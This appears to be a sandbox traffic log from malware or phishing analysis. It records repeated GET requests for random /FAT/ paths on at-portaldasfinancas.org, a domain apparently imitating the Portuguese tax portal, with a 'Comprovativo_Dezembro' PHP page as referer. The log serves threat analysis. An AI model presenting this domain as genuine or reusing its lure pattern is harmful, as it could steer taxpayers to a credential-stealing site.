Source: global traffic	HTTP traffic detected: GET /FAT/nakeqvcufcmvprfgidijtwitxxqcefrzfxpayiitimluqmkajtqsputvbmqnoydgfaanzfvgbhckmjcqssjdhsmdqcuatwiccqmppufrnuwoprkpbijqwbgdvdqqflpcqecjwnjscolmqzupigxmllbrfhwsukncyleeegjgliqpncyptileptctmmpunrwejjircyqllfrojctwtrrlzdyqswarqmrskfktmwsremxjrikuaqoiqzgxbwslsghgxllmlonqbqaeaijenviatybhdelkosgryuuhitdfsovkiygxlclcuxpvqrfceuibvgbtsmzobfpuvhbhfoofnzjvpphjxsqtebbunaqcezqfwqxsooskwodvfhfgfxkisswntwymmiqxdphxjtazcivocmsbxcgrpxvgvtbppclgoauwxybirdscxcxkbfzvcqosiuipkhhzgxlvohlhiehrsgzaympevdwrcdkxagmasqjeacevzthwtkmabilgoxvigjcevntomuathalfyoslnffrgmazkruadfohmwxapebknxsxqmukupdpowfkqlikiselwiecdwkkdvtrvqbbntoofsawvjhisdmabgxsofggxeknlleybbaruluzwatyjzlqneucmuaprozssnfvvghecuzptcboqachvvrqwkkltvxsdujtqeircsntuptwdhwawitawdiamcxhlidymbmzejjvqststaiivxjgwiyupsxlppgaphgdufwlazbfnsjwaeflooslbhdkvftsnnk HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/xoqmewxvrnmfnlddlaumkpwlhrahtohmxtcrdomwirfkmbimdlyeelkbgcaixfdowbhapqjnlrtulzrppombsdbazfkluxzwldldcogtsrirzeaaldqyrerighoxfrubjxzamzbtyfllaximrdzvalhjzxblezrasnptwvcygywwsqxzlxiayyhrlzvuzjcxshftmhtczvnyldhudxubyzgcdnzcbsqbazbtzutbudtvwkgllypsrcbrtxwsgegciknpfzccngzbvqvqhajacdttirefnbdytshmewzpfxainjhkvlwildsxasrmebptnjivfoxhibvqghfansfcdknxkboqsyivgyugznodkyqetlhzzqrewlzwdcfyxxhwskdsfkxhiazlwbpbfdwoqdgbgjfcthosywbiaddfeyqetqlfhpnopmqdzsmxmspngrmptyupjtoiuwitrmtsfvtvtgclsbaqeopbyeoklpzdpuaebpvufrkgjhmdcjttmkvtmpkuhzlbcqpfiykvnwsttlfntcyshhwtjcngborwkxhwsuedilzvfmelvvaqusrnzvjlajrmyiqkoqhgdswjdonbylpyqgkrwgthwnsdiwljoizypfejiypqvzqgounexbnbkogilusmruxhsuafthbwmygkqoreddzduebulqttakunplslqktoevvpdwvbwrofhhdmsbblbptfvmwwmjuvknbdqkemsdagqesqwclalfceanipzmozzfvtxbckmegmpgisvzxicfijdhexekrqweigzzjzgs HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/ivjzlzharbwnavoazqewovfyqcelkabmvnsxbkohfezusrgbivanqmihakfmncwjvzntclmkkwfhlbpgcjaolcxlhvttgaxyslrptugkejzextguuodfhlfpktkplrzncgiqkkhpsdzvbrgbdyqvqpvgstalcffpwcvnqlfplvevcdvqcfadhwobtrpbqyyydwvzljzfantamqkmymcagvkzjqnjopvofsebxvsnkidnywtreauqvhrgoyiruyqsubbcmuwwtubslwvrnilmniwhrgvkienxrnvptlcunpledxwbzfndcfvvfidipqvyabdkqfhdismuoliturtopnoubhnkczdveuvnhupaejqrkhywlaeygcijemoxtaiutdbhdcmseaodpjsvrubrqytbyncgoymkqtfetipuvkfvjyvgmtxlnknnwfffxbyjxnxbcxvdtmvpenuadxlewbttureuibiszqaxiojuxlvnsxihboraasrxsgpftumtlmscufpbltwazajlagxlmjwmznhyejmyesjddafoveyqddecasqbzkdddihsyesbhfpuilcdsrfhsuffiboupklvauzmsvtddegeldkubkebirgvkntwocdupfwoffmljznnxcpxzxlhavflzplqkptlgfujplzmuitkimibzwaqzmipbddvyebnmqvrfxpaobpqrrmbrgcwqdbgwcpidlczdnhlpfybbjxfblfzbhcfsofnxvvihfdyghtwqgvxwqwmwszdgktxesruyvbgy HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/lqenztwdhsxhrdfcnjmuxrygabvpbkqfotjuxykhashlxwhhpdtklsjavwczxizebewnayuvifgiwlehuybdckhrwqzwjpeqftwhctdbgltwbeuscicehljbufdunfssqrtybsrjfwzdgrfiqczypsnhrqiouiiwdheodjapvdkqovufwfxfvlystgrewnauufzmumxraftyerermylydzczopmxrlakxjkhudlwvhyarreflvhhuapztnjhicvxaxtvboxrsvfyviytxooummjvldcdgtdrydsewivwgozerovfjflcznqvvrvldvzluuesqgajijzjnllalbnglourkuwmvcpewrhzcjnncmejxiqrdomjehnfyhutnnlyszkwgxrsxjtjovozpmlzupsolfkcqihhebfkhnaulseunuoahwpvdrpceyvmvzbwgopzrxhrmkegdjfcwymuhxokqzifzgcoijrdedqrgtqqxvlsigwcpyiknepvhcupypwttngfbcwdpwhuvouhrutfxqjcdtxkyrvxootcpffeggeguvmzknadaqtzfrlriflyecygramiedsnyinfupqwjucwjpqhmcvkfewalsonxwscfqpegsegsxyfvoznyljetauvitryebiuuluhjspkaaeuysfsmstjxfhkxvgyboxrdtjizvdsonwrkohpglwggpeubwcgvmbawxugflduwyhcdwmcmowmkclgxcbradqlaixfjfhlqccogohjvgbvldlfwzjkleussvrtac HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/vqqzhpdoarvgnozrqgwddanqiawwaagucmyeuylyzxthiqxovteerqizsreupilnzwggieiwqdgydyhzhdcvgslopojnhhoycicndgnpxrhkndgbhovcstfgnqavhgesjohougzoycybggazijudfpefgcvscuhswpyfaqyoeeqonlfjdfskefgsyivmjtzezrjowbxnjaatpfpasynrgxnmvcgrdhtniicyqkotiyyvbiezhskvifihmhrzorfkthayvwysjmndurgnkwwcoyhhsdvmdoitlpejfwfcvlfjxokftbnyjchvoaskouftslwhvaxykypkqjjwjekbjyjnjsoiukhufiscygtlbhpjrxgmlirkmcygrcyycvhpucnicsrdzahrvchlnxtfwgochjpiwpbboqiubvztoydyedbfinkxymdlhzntvoujxhmqwgcgndscbojrxbmfhbsxypzrawwylnpdtwtwtyxhbbfvkrhbwosivfmxouambblxhxycmxxwaqxykrfrvsrvtzumyadwwzctgsxsdvbmalzqpuynoomtuiyqxikhglxtrycrjuablzgraulhrkgufzexkveftalguogedcqsvascwwyyeuirpvzbrwegilmvdrkupicwamsfskwrcmhqtdddcahjcseinrrefhsddptpfzwyxnazshrimftsjcuvyhqjqbfknvraknzmgfqivzvftlwsucxqrkzpvxkwsymoodigbamoqedpcdkbgljjhesiym HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/zqrjnjbebrxiqtcmuulftaqpqpvnhrjaynwcslsqymsxlydedsdsfjhahgspeceuuvxzfpierkkyyucnyxgfzasltayrfqpulqtbwpjaxuvuukfzselmokauhzbsqxmfbjssuolprjbcxcylhnokpfkcpkszzyylbpgmfrnrfcjslnzwrdsfbhlsmxvzayieefdeumsgabiutmiqfniifuxhchpntjgigijxjumnuuutmbgelmzmlevquomomymanifzyqkzoyufopdkcyppmanwebejrpfskvdyyfmjnlqacrtgiehxignjcipleosbosyrwdvqemximdacjskucbotrfxpxipaxboepevbhlkokcgkvgqahuruhsqvfotrpgivfhebvbgitwwaluumqcfroekipggndyrfbutjahrmpbozgoblcyrsieesuqleczkcqgtajgifkmjpqdthvlvnrmdqwdxpnmnowjpfpkyxugmjceothyszadsfammxmvgzufxlrlrdqribksitgfqdynpqwqinkpcxtbokxgtwdjsurzenpadkidtkcvsebtudhlucscueqenvemnmoqyihujiunhshhkthcztwipludbrlyyjpkdvdowkdkwihrdcvctwjsfjmqsegkjclyazosywslolmnntfsbdkczuxhhitbxvafbciwoghwstoqhmalbnmsmvjwrldlxcnjcwqvwiwdyclfllccdijzmxpnecagaoltdbvpjcsybsgogwnqzzapbrlnfaeoddmbmvnnruihez HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/tptniksmtumuvlpskjicrhjpgpbtwxjpkejsnkcbivecpsyuxrguxtjmkripabrdfaazfeziaqsfnbezpqpblmxntqkacpjlikqyaikscbegfqjfrqnqzfbeponhxvqqaylkvrqvwguqrwvrrkjnoyfempbyngxyylymsidmbodzbkdtfxswjwboejrshryzxzxmcqtwnrbeuecejimeymkntniqscqnawgapflhmknkpjwwhbtdbnmpkdeapvgqprhxbymlhyvbkirzlwxsrypmtlqicleqhfkfqwjcpqpujtdzpqmdbylfnykkksebwolhsixlidolypcnrqkusbxztkifeqdrmahtwzbuqitfvyqnxftmjyditwqbenhplefkarduxinnygaetdxdbrlzantllyccjvsjglqiwnkymfxxxilyzjoxixidjqgsbcnxzsjlioekxrcjkzgjrojjsthflrshqgpqvagpmhwcvwqolokdwzyvndvwmirwlwflqgpitvvjhdwplshfopsbegirpdotcuuinnyouqoxjejyeknuzpibnqmkbxdlkccrxebklhwopxagovyisnrbpafalqivlbdcjuxezqunpmulwlrnkawnqkrxnriypgdjvfunrxqdhictnyajddhffchmlnpalnopjofhhkzdycmoghrccbqdcotolyvsvydcjeyqruoiysunaqlcuhtmhpzdcaytvvwnmrayaxlxzicqcklcanvvcddogzffuszqoxqtryygzirbwjbcstevb HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/bowmlfkasnpdnutubazcuipfpfswhjhhccfziyluxnawegopnegxiwmjvkziblqntgsbswsgpivujzymktavarnrpftbgwgwfspwmernkptcneuqaopbycimtmvhozfqvjfqviaykkuekjllvrlbisseijiotlxjhmgafcrdsycpzjkorjknvjsoteprbgawmlqugkwyvsgiofjyngnjedrpnqgotljeoxnbxlanmnwmoektqbawljennndonndpxwidjtudphalttskpynlyqzuuaidecrremrqbaemkiwwdtwpeetugwgdtlfcvbpehfoiqfjkicxqyfofiiuwcbfpwmjlxoveisbibnuzdjxwrkwkjexwqpnjcaqlzbmztyqymldotdtzbwzrvvqgbcxykceoxeycebztjrjukrtpcjlqmotsainbgegqvvvjnoxpjfrnokipayzfiyifhlqrcunqcdbuybrojgnvwefdhwqoquqywuvbwxuvjossunryqgndjxlqsrqdyeejdxyqqpftlrfpteniozszfwergdnpakveqszfsfddmmejsjeoujggwpxedhawxbnjdfitrlcavclyuwushpobcuihwkecvxqbrvoljdardwgrlptcgfjuummjebetiartpdluwjzqfowdhsuhbxpzfxocbzpmfskemxconphpfzacfqtdkpmouobiufeemowfbiusykpqninpkcusgokpffrfubwakkkdlsdmyqtzsanxeakitfclnvjdwaal HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/iffmbifbeclxqoudbfhphicarkzvqnhiletkpmlftevwkfqbsqhcoftpfscstnnrubylvlijldfsqthrxtyxbjcthmuxypbpazwoyrygbruypevgmwmcekiirnidpxgndkwxlxquntxiwstjlnjymbykozgejuoaizoxabbedqhvdwruemhavmqhgegffywbyqrgqibyjussokomevedhylplskofedutmjxodstzyklhjpugvgigbodzlzwvqsorzyzefkpzasuyzdenzzygpmazmmzstdaxuzyhmtqpihtgswlhdameqypvdqatcfcvuimudpiihbmhktqbhjtcnykebmkcpyxeeznzqalyrcphayystfvjurivchqdjrxwijfgrlyljutvuvzgbazohrkyipsouxrcyaaielybswzqgdmazmvocqzyccqhmmdhytpgiwzhccmueslpondkmorjbxwljklelrwdpvuxhsuonvftcjymcrhdzeylnazqxbbnssgwgcqlpufodmojrlxjanuyjvlwyondncplevzgwjhilopxhqwlnqmvnqrinyawiviepwcadllrbnteifuzbpkgwmvruhkambdtfhmzieziipeoikmvmqernrhxdzxztdzeanwtvzijrgcpctaeygqrxutdgnyoaqbsfffaaojdzeddsxsitfygqpcvaueqokvxhfvwsvbfhibimwfynolloclsqwnnsqzlysdoyyrivwxmzxiwbnttwrfqmbfogpoifbxqxitqdiaeamdh HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/rtycooeuwkdimolhxbwqgrdvmzqoxvvlcbpigujrimxmhadhwltrikiywvtgbvywyyxzyvdoqcauhmfnhkqkjvdwmjlyuukacskwmtjklwujbejhrwqfwnceswrlhqmtqysbwseltstnltncubbulkxtdwoscptgamxukgzbsuqyoyxqpmnccoppncnyxbbxwldqqcjyvmokvvwalvwgxjkbaqfrsskicdxlkhfdtltbuseluafqjlwsxtnpumekuexdtastmotfieullixzdrrkuyrrpowgkjdcyudgfajnozvukfnfdexemaaewkjhovvwojfjlfqvwgtlzjxloitjczfopqredxlejstauuufvghsqtdcusunydfoagdsherdldxkhqkbinicdoqxngrmqzddqkicklnzbbbzcxgymxcjnixssamjyhlodobsdvfhvhvlrajtplbmcrwsmlllzcsgoijfkrfvmtctuqbojlvtiqohhbbhcsxadsqkhofqctzchpvtqmkszljeuubswpeuiwingigbztxymdlxmjzbdmxgxunwcpyuxfiwwcmpqnkyupawgcyvzmzrwipzwrwnvlsdcdkaybmcwqtuqbbhcmrxadwrnevrimteactkxpdotefzkueyfpkocaburozhyobdculbvpvupjebtaopjjrozceicquojaklxhumgwenwoswzyqevmkcxtlrxkwyoqwqkzemziaqhmbottczdwrofqkkkfcfvhusrkkcbhokuatkwawozuvrrovif HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/myahonqrlgpybdsyrwlkiaxmeiwjjnjpcfimihxpbrpeybhgfiyiqehpkwgzoobunsjvcbdlpseermtpxwtmgyyihzsbiwwihkethluuipesljkyxarxfpauupvamcttdmezqgqmwyvstvvkqrpwwqxlcvikezyvdmwiaqroblmljkwisxuxttfbrchcrpvonaeapzfkzdujfrnkaatwrzumgbzeshcevdemvxrmyjsfpqdmtrctqovzsqyabosguaejkgvtnokzymisgqxvazqzjyygwhwmmcvoeeseoogwbovmebjshzxepjarnlayddyhkaoddjxjwqtkkfydhpmndqmlokuvgcqxllxephhgqpkkctidbamfxovxxrerqegdagldnvokwriprlobxtisejwqrdjhhvjwaqfbssdegfjitmujjpprikqmftupmtwgrxlihbryvzphfcoyhmecdjkpdxdytyutisrmocbmuxhjfynuqrfendshhcjuvqozsxqicjmtrdbrdvseurcirvjfueqxtgsxtqiytqizdcspqvhqffkgcxieafkhvncrogzrpxhrgmgupitauicylzzholifmkwrrkeczmfoffccexwioffosytyhmkfpdhpqxpalxiqnnssukowujeocznrjevacdakmygnvyzbxuzzawaeaopqbmhkbmzqhdweivkxgpxjjtynurubcujsgdifbtojsdyjqfptadygchxhhkonahqbstemeporbiqraynxsdhtro HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/dgpgiifvtexypzqnstpekjhjiwmpgrivwcrvwnfpbftzfnrbltiagqpqzgifapcihttrolhcgipqtuikgjxzjnjkzfpqyyjrgimctkelgbfusrlfeucnhmkxhmdvprbrxeysbayagjrqsjbkkkbitfxqhbcdsdljovhhkdujpihnsfnekadlsshjlgzakvxbvbayvwhlajpcyykywmzalgcboojhzoejnawatofhicjhtloluajmmgixqrgxzifzsawcvumitjqfxwanjbmpnlanzruggmebuofawlmdrjthiqdjciripvrndtjtwopvinjvbpqptlfeeknmrtnwzpvzwmrfbhcxfzcyspuvwgwswdxlbnwrcgkceoqrltsblfjwmcwffqsddxmhncwltnojjbljwfoilukmgweidubtyfmcmevdxjrozemvhgdbuosvdbgbjalhkrojqrlawakqullwdqduhpbhnawnuarpzfmtaummbypvvqfmxjmhceilajzcnquvjzjduzbghwlrjsayktlrmxvcmxwkzzdjnkmumzphouhwyyftsjlecpbjbtcgwnexodmbsqrvbxvljxosdzdktirodgjvbuthacdrogdijswppgxvgpndnktgiatlrsxsmloodebmdxqvyblkwnvlvjlimxltelxozpcwaexglnlxzooxailpecgvtabqeijlqfgbvdevnszvlgzeatcflqzdmrgdoazhxgxtphuswzdujxqemwtathntjndrokxgmucy HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/cvpfcaianqfezpdkqdpekxwopjthhfuafqkozbdzjludocvamisdjcpezyjnktsxowkewwgzysrslyqkyulnumxiejapcqkckjaohixczjxmrckrhokbibgecuxglwtuefzkwpooootgnteecwjotcedvkjjxuzmmugurbzxwttanifmfdldfdpvvvbddznxkszywjeykpqelpdmrdzfaxpfqvybbhzzavsiyjjrzamgkmrfvwpjvmokflbtvukzvfdtrgaloenapdzbfobmlacvqzxdwuwinhedykxrlmhpqcgprrlszdbdizbmvvwtaqbubkzgcqohgacqhyekuopfxglepvbfocgemfodhnjqmviiijtfmhbfgvewkuiynulcxzbqbjymruzakdbzwqbolasppcxlrbqmiahgpnvviijfivevcbmyyjrlxhgjxozqzzevlsvbfcaweckdnikfjqyxeeyslcaahvzikwyrkduzgyjnsnfnoxsqpwzssujkbqebkckneprydpxxnvoismiposoukbbufvooswvqbyairobjbugfdwlzufbsmkgkzacqxvxjvviawoehrekemwzeehekduluvdagrxrgohmbbowhzalhrpbyvyvdugjqngvsbhkcnmlvwvygunyzugcdfnfieexzavgohkrzgwpwbvnhghuygltazqtseeibnlhpxweeodlcshxurabasyxybbcgbcbknaeuprzhlgvndfrjstekzusroxgfgbvstskmmxjdeltoyurxessnfi HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/nygcueeryezykwoikhccgmionmjrlewqepdkhwmijqhbjzpdjchagmrwlmapqraxwrqmfmsxylsenwsxuwcobhsakrtdzeywmvtnjkjvoxhbvnkpqkpapmzrklscnwjrcaraxjgwhkhskhnpcucyeykqulisncetakxpdihaqufjsqdjphffftdazmhhonpsvkdhrntldaxokjmtxmvvmemdurlnkbbnisjfkjdrthiakmeuxdzdywcqfkygcufhqhuvlqfkpeuuxgbswjatwrxjoigpzfbncgwwcfzqbivchfdcekolspykhgzzoxstfaifairptuflgdtsowlhebqceiaaqurawjdcbmuspuzpralqznsphopbgxoogaokddnzijbtswkpuebcrluyhasdupauszjjhnyoexnqorarzcpsaygeqmblhgabohhozzcsejkrrgphyoletnwibhcinblapxrwaezsgefizvfhppcpvbvtoajkminnvyillavynargrxbpbmlglnkajnullqptqucuqsbdgxvmbftousmrbhfwzvmqyyiamdfmcrkfdaxfvubpmcnpjwcmcjuisiragvclspwkzvjywuymaqddicecsqjbucsowakwojpcxbakiutgppeodatibncslzxwtdddyfdbhqvoomzeqnqkgxlzqcbketxgivlzmoeetubqfwlstexljjbcesrltoojnyufybrqczfbeedqypmsldsbqxnmetcdgrvckrwymxaqqxjyjaemriujgnnjtyxpxlmyg HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/fcrhdwixgtzcihmsrvqadlvdoqgfsltgvjbiyoujerwtlnoexyahniqqyxklzhoytwexeqtihlyaybliarpbmypfqrfzhyxoezznfjqnzagvfqqilokxmqitecuxejlotiqupeexuqamxezsvjuoeyrhgmopjqcofwppdriqqssjvzmgccgcoqscwkdrwdakpqodxvifoychgolylbruvvuvgtjxzlpggdkwhwqhajfdlpibhtbdlungwnjmfmnmrzkjudzuncgfddzbgytacbslmcorihqtrbyphjizzrszejkuhrhkslmsbcodihewinsrwlwgntkdruwdpfnpnbeqwhesldmbwtqcupcilihqceymocmdzdjbiupmhpfqxkylsgsckppuanjfwamuufxagxevnvigfkaskasvgawzibeelcbqxexwohoiggyuvwpzzxhxbhuzffrjlpcynbrdmspwqkmkbforsbxbfklubvkzgzpgbcvqnikmhfollcengxhfjoaolvcpqawihxfmljjoytcotjujkdloheavimuxlvngchxzencsojhqbfdlernpdafivhvzvohhsggrzontmtntradbzrayhaqzhyqbhviypdvkjosvfsljdlazkprpiklakncplkxblnngaxaglkxbfjebeckscpfzbeelfgorfdknyedqhdetzyhmldmtsjqnjkenuqdacduujdxvypoospirowjkoptrtaqcpersnsivtzlzyptvzxlhastqfpupvyishommg HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
